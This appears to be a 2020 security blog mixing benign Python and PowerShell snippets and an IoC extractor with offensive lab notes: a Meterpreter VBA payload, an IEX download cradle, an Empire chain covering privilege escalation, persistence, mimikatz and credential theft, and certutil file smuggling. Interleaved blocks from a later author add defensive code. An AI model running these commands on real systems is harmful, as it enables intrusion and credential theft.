Saturday, February 15, 2020

python pefile ctypes kernel32.dll examples

import pefile
import ctypes
kfile = pefile.PE(r'Kernel32.dll')
k32 = ctypes.windll.kernel32   # the loaded DLL handle used by every k32.* call below


--- *** displays all exports of the DLL *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
 print(export.name)


--- *** executes a command like whoami *** ---
k32.WinExec(b'whoami')


--- *** creates a new folder *** ---
k32.CreateDirectoryW(r'c:\users\win10\testfolder', None)


--- *** prints length of a string *** ---
k32.lstrlenA(b'something')

--- *** start and stop a timer *** ---
start = k32.GetTickCount()
end = k32.GetTickCount()
elapsedTime = (end-start)/1000

--- *** get process id for the python.exe program running this code *** ---
k32.GetCurrentProcessId()

--- *** get current working directory *** ---
s = ctypes.create_string_buffer(50)
k32.GetCurrentDirectoryA(len(s), s)
string = s.value.decode()   # .value stops at the first NUL, so no byte-by-byte loop is needed

--- *** get environment variables APPDATA value *** ---
s = ctypes.create_string_buffer(50)
k32.GetEnvironmentVariableA(b'APPDATA', s, len(s))
string = s.value.decode()   # .value stops at the first NUL, so no byte-by-byte loop is needed
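Two things the snippets above gloss over: a fixed 50-byte buffer silently truncates any directory or APPDATA value longer than 49 characters, and subtracting two GetTickCount readings goes negative when the 32-bit counter wraps (every 49.7 days). The following is an added example, not code from the original post, showing the same kernel32 calls with explicit argtypes/restype, buffers sized from the API's own answer, and wraparound-safe tick arithmetic. The Windows calls run only on win32; the two pure-Python helpers run anywhere.

```python
# Added example (not from the original post): kernel32 via ctypes with declared
# signatures, API-sized buffers and wraparound-safe GetTickCount arithmetic.
import ctypes
import sys

TICK_MODULUS = 2 ** 32            # GetTickCount returns a DWORD and wraps every ~49.7 days
ANSI_ENCODING = "mbcs" if sys.platform == "win32" else "utf-8"


def tick_delta_seconds(start_ticks, end_ticks):
    """Seconds between two GetTickCount readings, correct even if the counter wrapped."""
    return ((end_ticks - start_ticks) % TICK_MODULUS) / 1000.0


def cstring_to_str(buf):
    """Decode a ctypes char buffer up to its first NUL (what the post's byte loops do by hand)."""
    return buf.value.decode(ANSI_ENCODING)


if sys.platform == "win32":
    DWORD = ctypes.c_uint32
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)

    # Declaring argtypes/restype lets ctypes check argument types and stops the
    # default 'int' return type from silently truncating wider values.
    k32.GetTickCount.argtypes = []
    k32.GetTickCount.restype = DWORD
    k32.GetCurrentProcessId.argtypes = []
    k32.GetCurrentProcessId.restype = DWORD
    k32.GetEnvironmentVariableW.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, DWORD]
    k32.GetEnvironmentVariableW.restype = DWORD
    k32.GetCurrentDirectoryW.argtypes = [DWORD, ctypes.c_wchar_p]
    k32.GetCurrentDirectoryW.restype = DWORD

    def get_env(name):
        """Read an environment variable via kernel32, sizing the buffer from the API."""
        # With nSize=0 the call returns the length needed, NUL included; 0 means not set.
        needed = k32.GetEnvironmentVariableW(name, None, 0)
        if needed == 0:
            return None
        buf = ctypes.create_unicode_buffer(needed)
        k32.GetEnvironmentVariableW(name, buf, needed)
        return buf.value

    def get_cwd():
        """Current directory via kernel32, again asking the API how big the buffer must be."""
        # With nBufferLength=0 the return value is the required size including the NUL.
        needed = k32.GetCurrentDirectoryW(0, None)
        buf = ctypes.create_unicode_buffer(needed)
        k32.GetCurrentDirectoryW(needed, buf)
        return buf.value

    if __name__ == "__main__":
        start = k32.GetTickCount()
        print("pid:", k32.GetCurrentProcessId())
        print("cwd:", get_cwd())
        print("APPDATA:", get_env("APPDATA"))
        print("elapsed:", tick_delta_seconds(start, k32.GetTickCount()), "s")
```

The wide (W) variants are used for the Windows calls so that `create_unicode_buffer(...).value` is already a `str`; `cstring_to_str` covers the A variants the post uses.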

Friday, February 14, 2020

Generate Meterpreter Metasploit VBA

msfconsole
use payload/windows/meterpreter/reverse_tcp
show options
setg LHOST 10.10.10.10
setg LPORT 3000
generate -t vba -f meterpreter.vba

Copy and paste the generated VBA into Excel.

Powershell download cradle

Sample download cradle, used in conjunction with python -m SimpleHTTPServer 80 serving the script:

powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) setup a listener
listeners
uselistener http
execute

2.) create a stager
usestager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) set up a web server to serve the launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have the victim PC reach out to the attacker PC, download launcher.ps1, and execute it

5.) interact with agent
** you should see the agent check in as soon as step #4 above is complete **
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usemodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, a new agent running as admin should check in immediately after step #8 **
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getsystem
execute

12.) see where you are
whoami    (should say SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usemodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found

Thursday, February 13, 2020

Powershell split and sort

In PowerShell, if you have an ugly string like the environment PATH


PS c:\> $env:PATH

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\Microsoft VS Code\bin


you can quickly split it out and make it pretty like this

PS c:\> $env:PATH -Split ";" | Sort-Object -Unique

C:\Program Files (x86)\IBM\Client Access\
C:\Program Files\Microsoft VS Code\bin
C:\Program Files\PuTTY\
C:\WINDOWS
C:\WINDOWS\system32
C:\WINDOWS\System32\OpenSSH\
C:\WINDOWS\System32\Wbem
C:\WINDOWS\System32\WindowsPowerShell\v1.0\

Tuesday, February 11, 2020

Using certutil.exe to transfer files

1.) create a file to encode/transfer

> Add-Content test.txt "a test"

2.) pack it up as a certificate before transfer

> $raw = get-content -path test.txt -Encoding Byte
> $b64 = [System.Convert]::ToBase64String($raw)
> $begin = "-----BEGIN CERTIFICATE-----"
> $end = "-----END CERTIFICATE-----"
> "$begin$b64$end"|Out-File output.txt

3.) transfer it however you like

4.) receiving end decodes it back to original state with certutil

> certutil.exe -decode output.txt decoded.txt
> get-content decoded.txt
      a test



---
explanation
- create a file you want to encode/transfer
- convert it to raw bytes
- base64 it
- wrap it into a legit certificate file

- now you can transfer it

- then on the receiving end use certutil.exe to decode it back to its original state
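The envelope built above is just base64 between a BEGIN/END CERTIFICATE header and footer, which is why certutil can decode it even though the content is not a certificate. As an added example (not from the original post, and not part of certutil), the Python below builds the same envelope, decodes it the way the receiving side does, and adds the check a defender can run on a "certificate" file: a real X.509 certificate is one DER SEQUENCE (tag 0x30) whose encoded length covers the rest of the file exactly, so arbitrary smuggled data fails that test. The sample inputs are constructed.

```python
# Added example (not from the original post): wrap/unwrap the CERTIFICATE envelope
# and check whether the decoded body is plausibly a DER certificate at all.
import base64
import binascii
import re

PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)


def wrap_as_certificate(data: bytes) -> str:
    """Base64 the bytes and wrap them in the header/footer the post uses (single line, as it does)."""
    body = base64.b64encode(data).decode("ascii")
    return "-----BEGIN CERTIFICATE-----" + body + "-----END CERTIFICATE-----"


def unwrap_certificate(text: str) -> bytes:
    """Reverse of wrap_as_certificate: pull the base64 body out and decode it."""
    m = PEM_BLOCK.search(text)
    if not m:
        raise ValueError("no CERTIFICATE block found")
    body = re.sub(r"\s+", "", m.group(1))          # tolerate line-wrapped base64
    return base64.b64decode(body, validate=True)


def der_outer_header(data: bytes):
    """Parse the outermost DER tag/length; return (header_len, content_len) or None.

    Every X.509 certificate starts with a SEQUENCE (tag 0x30) whose length covers
    the rest of the file exactly, so this is a cheap first plausibility check.
    """
    if len(data) < 2 or data[0] != 0x30:
        return None
    first = data[1]
    if first < 0x80:                      # short form: length fits in one byte
        return 2, first
    n = first & 0x7F                      # long form: the next n bytes hold the length
    if n == 0 or n > 4 or len(data) < 2 + n:
        return None
    return 2 + n, int.from_bytes(data[2:2 + n], "big")


def looks_like_der_certificate(text: str) -> bool:
    """True only if the decoded body is a single well-formed DER SEQUENCE with no trailing data."""
    try:
        body = unwrap_certificate(text)
    except (ValueError, binascii.Error):
        return False
    header = der_outer_header(body)
    if header is None:
        return False
    header_len, content_len = header
    return header_len + content_len == len(body)


# Constructed samples: the post's "a test" file (Add-Content appends CRLF on Windows)
# and a minimal DER SEQUENCE holding INTEGER 5, standing in for a real certificate body.
SMUGGLED_TEXT = wrap_as_certificate(b"a test\r\n")
MINIMAL_DER = wrap_as_certificate(bytes.fromhex("3003020105"))

if __name__ == "__main__":
    print(unwrap_certificate(SMUGGLED_TEXT))
    print("smuggled text looks like a certificate:", looks_like_der_certificate(SMUGGLED_TEXT))
    print("DER sequence looks like a certificate:", looks_like_der_certificate(MINIMAL_DER))
```

One caveat on the PowerShell side of the steps: `Get-Content -Encoding Byte` exists in Windows PowerShell 5.1; PowerShell 7 replaced it with `-AsByteStream`.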

Friday, February 7, 2020

python test ioc extractor

# Steps
# 1.) Drop IoCs [IP addresses or URLs only currently] from the sources below into "iocs.txt"
# - Emotet ( https://twitter.com/Cryptolaemus1 )
# - UrlHaus ( https://urlhaus.abuse.ch/downloads/csv_online/ )
# - Phish Tank ( https://www.phishtank.com/phish_search.php?page=1&active=y&valid=y&Search=Search )
# - Trickbot ( https://twitter.com/search?q=%23trickbot&src=typed_query&f=live )
# 2.) run script
import sys
import os
import re
from urllib.parse import urlparse
debug = 0
filepath = 'iocs.txt'
ipfilepath = 'ips.txt'
dnsfilepath = 'dns.txt'
ioccontainswhitelist = [
".sendgrid.net"
]
iocwhitelist = [
"google.com",
"www.google.com",
"urlhaus.abuse.ch",
"pastebin.com",
"ak.imgfarm.com",
"docs.google.com",
"drive.google.com",
"i.imgur.com",
"img.sobot.com",
"imgur.com",
"www.imgur.com",
"raw.githubusercontent.com",
"github.com",
"www.github.com",
"adobe.com",
"www.adobe.com",
"ibm.com",
"www.ibm.com",
"dell.com",
"www.dell.com",
"bing.com",
"www.bing.com",
"msn.com",
"www.msn.com",
"documentcloud.adobe.com",
"cisco.com",
"www.cisco.com",
"oshkosh.webex.com",
"l.yimg.com",
"yimg.com",
"dl.dropboxusercontent.com",
"dropbox.com",
"www.dropbox.com",
"godaddy.com",
"godaddysites.com",
"files.constantcontact.com",
"ipinfo.io",
"bit.ly",
"onedrive.live.com",
"000webhostapp.com",
"storage.googleapis.com",
"wikileaks.org",
"forms.gle",
"go2l.ink",
"capesandbox.com",
"twitter.com",
"paste.cryptolaemus.com",
"cryptolaemus.com",
"gist.githubusercontent.com",
"bitbucket.org",
"img1.wsimg.com",
"cdn.discordapp.com",
"web.mit.edu",
"bit.do",
"na3.docusign.net",
"sway.office.com",
"sites.google.com",
"aka.ms",
"login.microsoftonline.com",
"track.smtpsendmail.com",
"r20.rs6.net",
"files.gamebanana.com",
"sems.sas.com"
]
with open(filepath) as fp:
    ipResults = []
    dnsResults = []
    for rawLine in fp:
        # strip the newline from every line (the original only stripped the first one,
        # so later domain-only lines were written out with a stray newline) and skip
        # blank lines instead of stopping at the first one
        rawLine = rawLine.strip()
        if not rawLine:
            continue
        if debug:
            print("DEBUG: reviewing %s" % rawLine)
        found = 0
        ioc = None
        isIp = 0
        isDns = 0
        ipRegex = re.findall(r'(\d+\.\d+\.\d+\.\d+)', rawLine)
        if ipRegex:
            ioc = ipRegex[0]
            isIp = 1
            if debug:
                print("DEBUG: IP address %s" % ioc)
        if not ioc:
            # raw strings so the backslash escapes reach the regex engine unchanged
            urlRegex = re.search(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', rawLine)
            if urlRegex:
                parts = urlRegex.group().split('/')
                if parts and len(parts) > 2:
                    ioc = parts[2]   # scheme://host/... -> host
                    isDns = 1
                    if debug:
                        print("DEBUG: url with http %s" % ioc)
            if not ioc:
                if debug:
                    print("DEBUG: checking url 2nd time")
                urlRegexV2 = re.search(r'^([a-zA-Z.]+\.([a-zA-Z]){2,7}\/.*)$', rawLine)
                if urlRegexV2:
                    parts = urlRegexV2.group().split('/')
                    if parts and len(parts) > 0:
                        ioc = parts[0]
                        isDns = 1
                        if debug:
                            print("DEBUG: url without http %s" % ioc)
                else:
                    if debug:
                        print("DEBUG: checking url 3rd time")
                    urlTest = re.search(r'^([a-zA-Z.]+)\.([a-zA-Z]){2,7}$', rawLine)
                    if urlTest:
                        ioc = rawLine
                        isDns = 1
                        if debug:
                            print("DEBUG: url domain only %s" % ioc)
        if ioc:
            ioc = ioc.lower()
            for ignoredIoc in iocwhitelist:
                if ioc == ignoredIoc.lower():
                    found = 1
                    if debug:
                        print("DEBUG: ignored %s" % ioc)
                    break
            for ignoredIoc in ioccontainswhitelist:
                if ignoredIoc.lower() in ioc:
                    found = 1
                    if debug:
                        print("DEBUG: ignored %s" % ioc)
                    break
            if found == 0:
                if "..." not in ioc:   # skip IoCs the source truncated
                    if isIp:
                        ipResults.append(ioc)
                    if isDns:
                        dnsResults.append(ioc)

ipResults = sorted(set(ipResults))
dnsResults = sorted(set(dnsResults))

with open(ipfilepath, "w+") as fp:
    for ioc in ipResults:
        fp.write("%s\n" % ioc)
    if len(ipResults) > 0:
        print("%s created" % ipfilepath)

with open(dnsfilepath, "w+") as fp:
    for ioc in dnsResults:
        fp.write("%s\n" % ioc)
    if len(dnsResults) > 0:
        print("%s created" % dnsfilepath)
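The script above keeps its logic in one loop, which makes individual lines hard to test. As an added example (not from the original post), the same extraction is split into functions that can be checked line by line. It goes a little beyond the post's regexes: it refangs the `hxxp` and `[.]` notation that the listed feeds commonly use, rejects IPv4 strings with impossible octets, and accepts digits and hyphens in hostnames. The whitelist is a constructed subset of the post's list, and the sample feed lines are constructed.

```python
# Added example (not from the original post): testable IoC extraction with
# refanging, octet validation and the post's whitelist/truncation rules.
import re
from urllib.parse import urlparse

# Constructed subset of the post's whitelist
EXACT_WHITELIST = {"google.com", "www.google.com", "urlhaus.abuse.ch", "github.com"}
CONTAINS_WHITELIST = {".sendgrid.net"}

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
HOST_RE = re.compile(r"^((?:[a-z0-9-]+\.)+[a-z]{2,63})(?:[/:].*)?$", re.I)
DEFANG = (("hxxps://", "https://"), ("hxxp://", "http://"),
          ("[.]", "."), ("(.)", "."), ("[:]", ":"))


def refang(line: str) -> str:
    """Undo the defanging feeds use so the regexes below see a normal URL or IP."""
    for fake, real in DEFANG:
        line = line.replace(fake, real)
    return line


def valid_ipv4(text: str) -> bool:
    """Reject dotted quads with an octet above 255 (the post's regex accepts any digits)."""
    return all(0 <= int(octet) <= 255 for octet in text.split("."))


def extract_ioc(line: str):
    """Return ("ip", address), ("dns", host) or None for one input line."""
    line = refang(line.strip())
    if not line:
        return None
    m = IPV4_RE.search(line)
    if m and valid_ipv4(m.group(1)):
        return "ip", m.group(1)
    m = URL_RE.search(line)
    if m:
        host = urlparse(m.group(0)).hostname      # drops scheme, userinfo, port and path
        if host and not IPV4_RE.fullmatch(host):
            return "dns", host.lower()
    m = HOST_RE.match(line)                        # bare "host/path" or "host" lines
    if m:
        return "dns", m.group(1).lower()
    return None


def is_whitelisted(ioc: str) -> bool:
    """Exact match or substring match, as the post's two lists work."""
    return ioc in EXACT_WHITELIST or any(part in ioc for part in CONTAINS_WHITELIST)


def extract_all(lines):
    """Split lines into sorted, de-duplicated IP and hostname lists, as the post's script does."""
    ips, hosts = set(), set()
    for line in lines:
        found = extract_ioc(line)
        if not found:
            continue
        kind, ioc = found
        if "..." in ioc or is_whitelisted(ioc):    # truncated by the source, or known good
            continue
        (ips if kind == "ip" else hosts).add(ioc)
    return sorted(ips), sorted(hosts)


# Constructed sample feed lines in the shapes the post's sources produce.
SAMPLE_LINES = [
    "hxxp://bad-site[.]example/payload.exe",   # defanged URL
    "198.51.100.23:8080",                       # IP with port
    "http://www.google.com/safe",               # whitelisted exactly
    "mail.sendgrid.net",                        # whitelisted by suffix
    "update.badexample.com/x.php",              # host plus path, no scheme
    "999.1.1.1",                                # impossible octet
    "",
    "notanioc",
]

if __name__ == "__main__":
    ips, hosts = extract_all(SAMPLE_LINES)
    print("ips:", ips)
    print("hosts:", hosts)
```

To feed it the post's `iocs.txt`, pass `open(filepath)` to `extract_all` and write the two lists out exactly as the original script does.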